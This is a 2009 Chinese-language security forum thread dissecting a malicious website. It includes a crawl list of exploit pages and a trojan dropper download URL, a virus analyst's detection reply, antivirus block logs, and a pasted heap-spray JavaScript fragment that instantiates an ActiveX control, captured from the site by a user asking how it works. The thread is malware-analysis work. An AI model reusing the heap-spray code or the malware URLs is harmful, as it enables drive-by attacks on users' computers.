hxxp://www.jwhgqidff.cn/

显示全部楼层 · 发表于 2009-7-7 22:54:59

源自该帖（LZ 估计被 arp了） http://bbs.kafan.cn/thread-514944-1-1.html

Astox Demo v1

开始自动解析 - http://www.jwhgqidff.cn/
L1 - http://www.iuwhdagf.cn/asdklfj2398/index.html
L2 - http://www.iuwhdagf.cn/asdklfj2398/ct14.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ytfll.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/z.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctvod.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctxxz.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctqm.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ct122121.htm
L3 - http://www.iuwhdagf.cn/asdklfj2398/14.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/15.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/16.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/logo.jpg
L3 - http://www.iuwhdagf.cn/asdklfj2398/ctvod.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/b.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/d.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/091.js
自动解析 - Auto XOR - http://www.dfrtgssf.cn/asdflj23298ak/k.exe
L3 - http://www.iuwhdagf.cn/asdklfj2398/092.js
L3 - http://www.dfrtgssf.cn/asdflj23298ak/k.exe#version=1,0,0,002
L3 - http://www.iuwhdagf.cn/asdklfj2398/Turl.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/real.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/real1.js
关注 - http://www.dfrtgssf.cn/asdflj23298ak/k.exe

显示全部楼层 · 发表于 2009-7-7 22:59:51

Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.
Trojan-Dropper.Win32.Mudrop.bdq

Regards, Tatarinov Ivan
Virus Analyst

10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com

[ 本帖最后由尤金卡巴斯基于 2009-7-8 00:28 编辑 ]

显示全部楼层 · 发表于 2009-7-7 23:12:34

[2009-07-07 23:11:54] 成功阻止360SE.exe访问http://www.iuwhdagf.cn/asdklfj2398/ct14.htm，此页面含有微软MS06014漏洞VB攻击恶意代码
[2009-07-07 23:11:55] 发现360SE.exe试图触发 heap spray漏洞，已被成功阻止！

显示全部楼层 · 发表于 2009-7-7 23:20:09

红伞拒绝访问。

显示全部楼层 · 发表于 2009-7-7 23:27:36

围观LS签名...

显示全部楼层 · 发表于 2009-7-7 23:35:24

什么都沒有

显示全部楼层 · 发表于 2009-7-7 23:42:44

什么“什么都没有？”

显示全部楼层 · 发表于 2009-7-8 13:19:16

2009-7-8 13:18:15 http://bbs.kafan.cn/attachment.p ... d1&t=1247030275 Internet Explorer 处理错误: Trojan-Dropper.Win32.Mudrop.bdq 启发式分析计算的威胁级别值较高
KIS8.0 kill
2009-7-8 13:18:15 http://bbs.kafan.cn/attachment.p ... 0275//k.exe//NSPack Internet Explorer 拒绝: Trojan-Dropper.Win32.Mudrop.bdq 启发式分析计算的威胁级别值较高
2009-7-8 13:18:15 http://bbs.kafan.cn/attachment.p ... 0275//k.exe//NSPack Internet Explorer 检测到: Trojan-Dropper.Win32.Mudrop.bdq 启发式分析计算的威胁级别值较高

显示全部楼层 · 发表于 2009-7-8 13:26:29

什么都有，N多杀软和防火墙的图标

显示全部楼层 · 发表于 2009-7-8 14:02:14

從 hxxp://www.iuwhdagf.cn/asdklfj2398/go.jpg
捉到的代碼如下

var slackspace=headersize+ytshell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+ytshell;
var myObject=document.createElement('o'+'b'+'j'+'e'+'c'+'t');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
請問
var myObject=document.createElement('o'+'b'+'j'+'e'+'c'+'t');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
這段code 中的 myObject.data= ./logo.gif
是讓0955AC62-BF2E-4CBA-A2B9-A63F772D46CF 去開啟 logo.gif嗎
但我用 Redoce 去捉  http://www.iuwhdagf.cn/asdklfj2398/logo.gif  都會 Failed
用8>Batch Downloading  下載回來的檔案是一個圖檔但無法開啟
請問這個檔案是要做什麼用的
要用什麼工具去分析呢
感謝大家謝謝

gankeyu: 请您下次禁止URL识别

[其它] hxxp://www.jwhgqidff.cn/

回复 5楼 gankeyu 的帖子

回复 6楼 sam.to 的帖子

回复 6楼 sam.to 的帖子

請教

浏览过的版块